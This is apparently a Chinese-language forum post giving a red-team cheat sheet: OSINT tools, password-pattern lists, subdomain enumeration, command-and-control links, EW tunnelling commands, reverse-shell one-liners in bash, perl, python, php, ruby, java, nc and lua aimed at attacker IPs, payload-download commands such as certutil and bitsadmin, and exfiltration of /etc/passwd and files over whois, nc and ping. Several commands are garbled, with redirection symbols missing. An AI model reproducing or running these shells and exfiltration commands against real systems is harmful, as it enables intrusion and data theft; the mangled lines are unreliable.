taibeihacker
Moderator
信息搜集
开源情报信息收集(OSINT)
github
Github_Nuggests(自動爬取Github上文件敏感信息洩露) :https://github.com/az0ne/Github_NuggestsGSIL(能夠實現近實時(15分鐘內)的發現Github上洩露的信息) :https://github.com/FeeiCN/GSIL
x-patrol(小米糰隊的):https://github.com/MiSecurity/x-patrol
whois查询/注册人反查/邮箱反查/相关资产
站長之家:http://whois.chinaz.com/?DomainName=target.comws=愛站:https://whois.aizhan.com/target.com/
微步在線:https://x.threatbook.cn/
IP反查:https://dns.aizhan.com/
天眼查:https://www.tianyancha.com/
虎媽查:http://www.whomx.com/
歷史漏洞查詢:在線查詢:http://wy.zone.ci/
自搭建:https://github.com/hanc00l/wooyun_publi/
google hacking
创建企业密码字典
字典列表
passwordlist:https://github.com/lavalamp-/password-lists豬豬俠字典:https://pan.baidu.com/s/1dFJyedzBlasting_dictionary(分享和收集各種字典,包括弱口令,常用密碼,目錄爆破。數據庫爆破,編輯器爆破,後台爆破等)
針對特定的廠商,重點構造廠商相關域名的字典
['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2 @','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
密码生成
GenpAss(中國特色的弱口令生成器:https://github.com/RicterZ/genpAss/passmaker(可以自定義規則的密碼字典生成器) :https://github.com/bit4woo/passmaker
pydictor(強大的密碼生成器) :https://github.com/LandGrey/pydictor
邮箱列表获取
theHarvester :https://github.com/laramies/theHarvester獲取一個郵箱以後導出通訊錄
LinkedInt :https://github.com/mdsecactivebreach/LinkedInt
Mailget:https://github.com/Ridter/Mailget
泄露密码查询
ghostproject:https://ghostproject.fr/pwndb:https://pwndb2am4tzkvold.onion.to/
对企业外部相关信息进行搜集
子域名获取
Layer子域名挖掘機4.2紀念版subDomainsBrute :https://github.com/lijiejie/subDomainsBrute
wydomain :https://github.com/ring04h/wydomain
Sublist3r :https://github.com/aboul3la/Sublist3r
site:target.com:https://www.google.com
Github代碼倉庫
抓包分析請求返回值(跳轉/文件上傳/app/api接口等)
站長幫手links等在線查詢網站
域傳送漏洞
Linux
dig @ns.example.com example=.com AXFR
Windows
nslookup -type=ns xxx.yyy.cn #查詢解析某域名的DNS服務器
nslookup #進入nslookup交互模式
server dns.domian.com #指定dns服務器
ls xxx.yyy.cn #列出域信息
GetDomainsBySSL.py :https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47atype=note#/
censys.io證書:https://censys.io/certificates?q=target.com
crt.sh證書查詢:https://crt.sh/?q=%.target.com
shadon :https://www.shodan.io/
zoomeye :https://www.zoomeye.org/
fofa :https://fofa.so/
censys:https://censys.io/
dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com
api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com
community.riskiq.com :https://community.riskiq.com/Search/target.com
subdomain3 :https://github.com/yanxiu0614/subdomain3
FuzzDomain :https://github.com/Chora10/FuzzDomain
dnsdumpster.com :https://dnsdumpster.com/
phpinfo.me :https://phpinfo.me/domain/
dns開放數據接口:https://dns.bufferover.run/dns?q=baidu.com
进入内网
基于企业弱账号漏洞
VPN(通過郵箱,密碼爆破,社工等途徑獲取VPN)企業相關運維繫統(zabbix等)
基于系统漏洞进入
Metasploit(漏洞利用框架):https://github.com/rapid7/metasploit-framework漏洞利用腳本
网站应用程序渗透
SQL注入跨站腳本(XSS)
跨站請求偽造(CSRF)
SSRF(ssrf_proxy)
功能/業務邏輯漏洞
其他漏洞等
CMS-內容管理系統漏洞
企業自建代理
无线Wi-Fi接入
隐匿攻击
Command and Control
ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icmp/DNS :https://pentestlab.blog/2017/09/06/command-and-control-dns/
DropBox :https://pentestlab.blog/2017/08/29/command-and-control-dropbox/
Gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/
Telegram :http://drops.xmd5.com/static/drops/tips-16142.html
Twitter :https://pentestlab.blog/2017/09/26/command-and-control-twitter/
Website Keyword :https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/
PowerShell :https://pentestlab.blog/2017/08/19/command-and-control-powershell/
Windows COM :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
WebDAV :https://pentestlab.blog/2017/09/12/command-and-control-webdav/
Office 365 :https://www.anquanke.com/post/id/86974
HTTPS :https://pentestlab.blog/2017/10/04/command-and-control-https/
Kernel :https://pentestlab.blog/2017/10/02/command-and-control-kernel/
Website :https://pentestlab.blog/2017/11/14/command-and-control-website/
WMI :https://pentestlab.blog/2017/11/20/command-and-control-wmi/
WebSocket :https://pentestlab.blog/2017/12/06/command-and-control-websocket/
Images :https://pentestlab.blog/2018/01/02/command-and-control-images/
Web Interface :https://pentestlab.blog/2018/01/03/command-and-control-web-interface/
JavaScript :https://pentestlab.blog/2018/01/08/command-and-control-javascript/
.
Fronting
Domain FrontingTor_Fronting.
代理
VPNHTTP :http://cn-proxy.com/
Tor
内网跨边界应用
内网跨边界转发
NC端口轉發LCX端口轉發
nps
代理腳本Tunna
Reduh
.
内网跨边界代理穿透
EW
正向SOCKS v5 服務器:./ew -s ssocksd -l 1080
反彈SOCKS v5 服務器:a) 先在一台具有公網ip 的主機A上運行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
b) 在目標主機B上啟動SOCKS v5 服務並反彈到公網主機的8888端口
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
多級級聯
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
lcx_tran 的用法
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
lcx_listen、lcx_slave 的用法
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
“三級級聯”的本地SOCKS測試用例以供參考
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Termite
使用說明:https://rootkiter.com/Termite/README.txt代理脚本
reGeorg :https://github.com/sensepost/reGeorgshell反弹
bashbash -i /dev/tcp/10.0.0.1/8080 01
perl
perl -e 'use Socket;$i='10.0.0.1';$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'S');open(STDOUT,'S');open(STDERR,'S');exec('/bin/sh -i');};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'
php
php -r '$sock=fsockopen('10.0.0.1',1234);exec('/bin/sh -i 3 3 23');'
ruby
ruby -rsocket -e'f=TCPSocket.open('10.0.0.1',1234).to_i;exec sprintf('/bin/sh -i %d %d 2%d',f,f,f)'
java
r=Runtime.getRuntime()
p=r.exec(['/bin/bash','-c','exec 5/dev/tcp/10.0.0.1/2002;cat 5 | while read line; do \$line 25 5; done'] as String[])
p.waitFor()
nc
#使用-e
nc -e /bin/sh 223.8.200.234 1234
#不使用-e
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe | nc attackerip listenport 1/tmp/backpipe
lua
lua -e 'require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i 3 3 23');'
内网文件的传输和下载
wputwput dir_name ftp://linuxpig:[email protected]/
wget
wget http://site.com/1.rar -O 1.rar
ariac2(需安裝)
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
powershell
$p=New-Object System.Net.WebClient
$p.DownloadFile('http://domain/file','C:%homepath%file')
vbs腳本
Set args=Wscript.Arguments
Url='http://domain/file'
dim xHttp: Set xHttp=createobject('Microsoft.XMLHTTP')
dim bStrm: Set bStrm=createobject('Adodb.Stream')
xHttp.Open 'GET', Url, False
xHttp.Send
with bStrm
.type=1 '
.open
.write xHttp.responseBody
.savetofile ' C:\%homepath%\file', 2 '
end with
執行:cscript test.vbs
Perl
#!/usr/bin/perl
use LWP:Simple;
getstore('http://domain/file', 'file');
執行:perl test.pl
Python
#!/usr/bin/python
import urllib2
u=urllib2.urlopen('http://domain/file')
localFile=open('local_file', 'w')
localFile.write(u.read())
localFile.close()
執行:python test.py
Ruby
#!/usr/bin/ruby
require 'net/http'
Net:HTTP.start('www.domain.com') { |http|
r=http.get('/file')
open('save_location', 'wb') { |file|
file.write(r.body)
}
}
執行:ruby test.rb
PHP
?php
$url='http://www.example.com/file';
$path='/path/to/file';
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data=curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?
執行:php test.php
NCattacker
cat file | nc -l 1234
target
nc host_ip 1234 file
FTP
ftp 127.0.0.1 username password get file exit
TFTP
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:%homepath%file
Window 文件共享
net use x: \127.0.0.1\share /user:example.comuserID myPassword
SCP本地到遠程
scp file [email protected]:/tmp
遠程到本地
scp [email protected]:/tmp file
rsync遠程rsync服務器中拷貝文件到本地機
rsync -av [email protected]:www /databack
本地機器拷貝文件到遠程rsync服務器
rsync -av /databack [email protected]:www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
copy
copy \\IP\ShareName\file.exe file.exe
WHOIS接收端Host B:
nc -vlnp 1337 | sed 's///g' | base64 -d
發送端Host A:
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
WHOIS + TARFirst:
ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it
Next
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out
PING發送端:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端ping_receiver.py:
import sys
try:
from scapy.all import *
except:
print('Scapy not found, please install scapy: pip install scapy')
sys.exit(0)
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type==8:
data=pkt[ICMP].load[-4:]
print(f'{data.decode('utf-8')}', flush=True, end='', sep='')